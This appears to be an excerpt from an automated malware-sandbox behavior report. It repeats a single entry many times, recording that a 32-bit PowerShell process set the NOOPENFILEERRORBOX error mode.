                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
